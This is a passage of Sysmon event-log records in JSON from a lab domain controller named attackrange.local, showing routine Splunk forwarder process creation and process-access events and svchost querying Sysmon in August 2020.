C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.125","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF4-5F25-0000-001069610500}","TargetProcessId":"2848","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3300,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.136\r\nProcessGuid: {41C8662E-1FF4-5F25-0000-00102A620500}\r\nProcessId: 2840\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {41C8662E-1FF4-5F25-0000-001069610500}\r\nParentProcessId: 2848\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: btool  server list general --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.136","ProcessGuid":"{41C8662E-1FF4-5F25-0000-00102A620500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{41C8662E-1FF4-5F25-0000-001069610500}","ParentProcessId":"2848","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"btool  server list general --no-log","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3301,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.125\r\nSourceProcessGUID: {41C8662E-1FF4-5F25-0000-001069610500}\r\nSourceProcessId: 2848\r\nSourceThreadId: 2832\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {41C8662E-1FF4-5F25-0000-00102A620500}\r\nTargetProcessId: 2840\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.125","SourceProcessGUID":"{41C8662E-1FF4-5F25-0000-001069610500}","SourceProcessId":"2848","SourceThreadId":"2832","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{41C8662E-1FF4-5F25-0000-00102A620500}","TargetProcessId":"2840","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3302,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.125\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF4-5F25-0000-00102A620500}\r\nTargetProcessId: 2840\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.125","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF4-5F25-0000-00102A620500}","TargetProcessId":"2840","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3303,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.125\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.125","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3304,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.125\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.125","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3305,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.125\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.125","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3306,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.125\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.125","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3307,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.125\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.125","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3308,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.125\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 